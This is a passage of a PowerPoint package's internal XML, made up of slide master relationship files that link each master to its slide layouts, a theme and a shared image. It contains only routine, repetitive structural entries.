Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout173.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout172.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme18.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout180.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout171.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189.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout188.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout187.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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout184.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout183.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout182.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme19.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout190.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout18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image" Target="../media/image1.jpeg"/><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199.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout198.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout197.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout196.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout195.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout194.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout193.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout192.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme20.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout200.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout191.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09.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout208.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout207.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout206.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout205.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout204.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout203.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout202.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme21.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout210.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout201.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19.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout218.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout217.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout216.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout215.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout214.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout213.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout212.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme22.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout220.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout211.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29.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout228.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout227.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout226.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout225.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout224.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout223.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout222.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme23.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout230.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout221.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39.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout238.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout237.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout236.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout235.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout234.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout233.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout232.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme24.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout240.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout231.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249.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout248.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout247.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout246.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout245.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout244.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout243.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout242.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme25.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout250.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout241.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster26.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout259.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout258.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout257.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout256.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout255.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout254.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout253.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout252.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme26.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout260.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout251.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster27.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout269.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout268.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout267.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout266.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout265.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout264.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout263.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout262.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme27.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout270.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout261.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster28.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout279.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout278.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout277.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout276.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout275.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout274.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout273.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout272.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme28.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout280.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout271.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster29.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout289.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout288.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout287.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout286.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout285.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout284.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout283.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout282.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme29.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout290.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout28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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><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30.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout299.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout298.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout297.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout296.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout295.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout294.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout293.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout292.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme30.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout300.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout291.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster31.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout309.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout308.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout307.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout306.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout305.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout304.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout303.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout302.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme31.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout310.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout301.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster32.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout319.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout318.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout317.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout316.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout315.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout314.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout313.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout312.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme32.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout320.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout311.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster33.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout329.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout328.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout327.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout326.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout325.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout324.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout323.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout322.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme33.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout330.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout321.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster34.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout339.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout338.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout337.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout336.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout335.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout334.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout333.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout332.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme34.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout340.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout331.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster35.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout349.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout348.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout347.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout346.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout345.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout344.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout343.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout342.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme35.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout350.xml"/><Relationship Id="rId1" 